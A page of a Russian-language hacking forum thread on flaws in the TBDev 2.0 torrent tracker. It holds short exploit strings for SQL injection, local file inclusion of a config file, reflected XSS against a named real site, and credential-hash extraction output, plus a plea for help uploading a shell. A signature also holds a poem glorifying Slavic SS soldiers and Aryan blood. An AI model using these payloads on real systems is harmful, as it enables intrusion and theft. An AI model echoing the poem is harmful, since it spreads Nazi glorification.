HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Перезагрузить страницу Трекер-движок TBDev 2.0
   
Ответ
Страница 27 из 27 « Первая < 17 23 24 25 26 27
 
Опции темы Поиск в этой теме Опции просмотра

  #261  
Старый 20.02.2010, 14:45
SoftLive
Познающий
Регистрация: 20.12.2009
Сообщений: 33
Провел на форуме:
206864

Репутация: 40
Отправить сообщение для SoftLive с помощью ICQ
По умолчанию
votesview.php?requestid=-99'



А вообще помогите через неё шелл залить/прочитать файл...

votesview.php есть в YSE немного старее чем с СВН, да и в tbsource дефульт есть
 
Ответить с цитированием

  #262  
Старый 21.02.2010, 02:35
xoren
Новичок
Регистрация: 20.02.2010
Сообщений: 3
Провел на форуме:
12959

Репутация: 0
По умолчанию
Trying to get your cookies... [DONE]
Trying to get passhash: 00000000000000000000000000000000 [DONE]
Trying to get salt: 11111111111111111111 [DONE]

Я не понял чо passhash 0000000.... и salt 111111111... где проблема ?
Последний раз редактировалось HAXTA4OK; 21.02.2010 в 08:14..
 
Ответить с цитированием

  #263  
Старый 21.02.2010, 08:14
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию
Цитата:
Сообщение от xoren  
Trying to get your cookies... [DONE]
Trying to get passhash: 00000000000000000000000000000000 [DONE]
Trying to get salt: 11111111111111111111 [DONE]

Я не понял чо passhash 0000000.... и salt 111111111... где проблема ?
не правильный id/ пропатченная версия двига
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
 
Ответить с цитированием

  #264  
Старый 21.02.2010, 22:05
xoren
Новичок
Регистрация: 20.02.2010
Сообщений: 3
Провел на форуме:
12959

Репутация: 0
По умолчанию
HAXTA4OK, понятно... :S
 
Ответить с цитированием

  #265  
Старый 21.10.2012, 19:42
OxoTnik
Guest
Сообщений: n/a
Провел на форуме:
290351

Репутация: 173
По умолчанию
Восстанавливаем забытую тему =)

Уязвимость скрипта: modal_mailbox.php (чат)

Тип: Локальный Инклуд

Уязвимый параметр: ?action

Exploit:http://examle.com/modal_mailbox.php?action=../include/config

Внимание, возможно потребуется регистрация на сайте.

Автор: OxoTnik
 
Ответить с цитированием

  #266  
Старый 25.04.2014, 14:21
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию
Небольшой UP

passive XSS (reflected)

Уязвимый сценарий: redirector.php

Exploit:

Цитата:
Сообщение от None  
GET /redirector.php?url=%253cscript%253ealert%25281%252 9%253c%25 HTTP/1.1
Host: bit-torrent.kiev.ua
....
 
Ответить с цитированием

  #267  
Старый 11.06.2014, 10:31
Yuna
Познающий
Регистрация: 22.06.2009
Сообщений: 41
Провел на форуме:
47299

Репутация: 18
По умолчанию
Бу, ну как - новых уязвимостей не появилось?

А-то руки чешутся git push сделать с багфиксами =)

А пока поделюсь:

Как известно, в движке, на данный момент, есть система репутации (Респекты).

Так вот, даже если юзер отключил приём личных сообщений, то:

1. Ему вс1равно будут идти сообщения от системы репутации

2. Система не делает валидацию того за то получает человек респект (т.е можно получить/дать респект/антиреспект за торрент который ты не заливал/которого вообще не сущесвтует )

Пример:

simpaty.php?action=add&good&targetid=1&type=torren t1

Меняем type=torrent1 на torrent12345 и респект всёравно проходит.

Не совсем уязвимость, скорее алгоритмическая недоработка
 
Ответить с цитированием

  #268  
Старый 13.06.2014, 04:26
Грабитель
Guest
Сообщений: n/a
Провел на форуме:
69791

Репутация: -7
По умолчанию
Отличное отношение к багам. Типичный "разработчик".
 
Ответить с цитированием

  #269  
Старый 13.06.2014, 17:19
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию
to yuna движок был интересен в свое время, сейчас аналогов много , а делать гит с багфиксами, смысл, если двиг не обновляется
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
 
Ответить с цитированием

  #270  
Старый 17.06.2014, 17:22
Yuna
Познающий
Регистрация: 22.06.2009
Сообщений: 41
Провел на форуме:
47299

Репутация: 18
По умолчанию
HAXTA4OK, а что в твоем понимании "обновляется"?
 
Ответить с цитированием
Ответ
Страница 27 из 27 « Первая < 17 23 24 25 26 27



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Прошивку iPhone 2.0 взломали ещё до её выхода geforse Мировые новости. Обсуждения. 1 14.07.2008 22:41
Web 2.0 выходит на государственный уровень vadim399 Мировые новости. Обсуждения. 2 12.01.2008 18:06



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ